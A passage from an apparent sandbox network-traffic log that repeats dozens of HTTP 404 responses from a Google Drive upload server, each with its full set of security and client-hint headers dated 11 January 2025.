allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgStLaXLA5F7jhOZoBjqve3Ri0jfMLb8sp5dm8vLPm9bhuQagsGQjc0H6Po-lVBYacKMvo6dypkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:42 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-h03F0nUFcjZD2fa8L9J-CQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQla8hEoLIPGTXtf1KCnznk0msrobAKyzJL8Wc-EpU1Y38sm-fRc5Vr1DIQUcq6ISJ-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-ehqt-zmHN5zrtQqTbCQ9hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR5zaczAEHKGYUdK-yO54xlSgj-yZBID855b95pOWM9xCHc13xYaF76dvWV_Y6KJrM7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-76epgjJ0rDguqb2wlieR3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRuUbV_aVg_Sd2zOcCY5b2hf0QFmeJwt6IqUH4VPI8uH7bwDS9NzfL6XL2VUJV16PYGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:49 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-fiMcf5HKxjiMN9Nm3BCX6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS65sHIKteAQRJ9OuA9iCRFVPNjinmraY1sYJfxIvygLGfD4ACUn8m9cnAQyZywgqkXtI_VfTIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:52 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Lv-tBs9R5wuFPTI0SI8jdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTrwjeKfxunfcpJKaKrbIAiGW4P1Ljr7ZJ7mQE08XtZhiDlTxy0WkAeWLnpEQgqPgdHx3RnLrMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:54 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zhkJkVePQUqbc-5bLKhEFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTaVSKliE-r_PVyofyaT3dnLYDHJSjWltWiBw5NU6NOgUV0Cs9ExVEHXHSxv9PUfiUTl04AoOUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:56 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-ecgEKlSzv5X6Zq2E2r8-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTtRmWoVRiINegPT1bfoYCWxBsFNdGTjoEKLeQodStgP6VJt-YkMw_H-7phXwDvVPP0bJsrDF8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ljTAyChWnrLer8c8jch8Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRG8WkLb31Ut1ucvbr2b6uOvIsSfcQbaPVd9cSsYTzu6E44pj48xNhOmjYJafErMSkZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:01 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-EcPLHr66Dt5TCYJ6lXLqQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT_x5rtIIXqYxIkKHJGIL5YYVD0Ec2JWNNgKtAL5EBKvaT7MOS6XWG3MVUUnS12bQVlContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:03 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-61RmDkyh32boM5cVfe-2Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQWXf7ns6deNNoSXRMSz6eIaAnAEE0RhzmHg_oGEsZdcd75xEweEHosjEUMXDaAgf9UfAP9T84Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:05 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-IlHjAJcJ_9mfYtrLrqBjkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSQbf7AyJOtEdZhRnKoXfDCVkdU56DIgx3DitzMT44VtqD-eGsZ9qb2uLtcJDT3n0CNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zDPM3XdZqNqAWWMAlXQdTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQKkP60NIDgEohueAlR17uU2GbLtiiBJKRDvV5qwIwsM9oRl6XM4T3mSJZxRl-HFXcNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:10 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-k_KXH2BzuqMaH0MFO7zbZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSbbiD62kraKvvuu3MZ9Dbq3DnRP836M5H8NBtX54p6Tz7Io9v26iZ0sNLWo0-PT6ebb_G0dBMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:12 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-r3mSy8_vFSl0NRCkUz1qPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQlQiztYfzb5Cw3AnNZ6vldyE9UFHzFm6rShExmjYQrl_VnCLITv8spmut8F5eiaOyoH5IaI4MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:15 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-iF-sJ2IIt1uldkia9Ec98w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 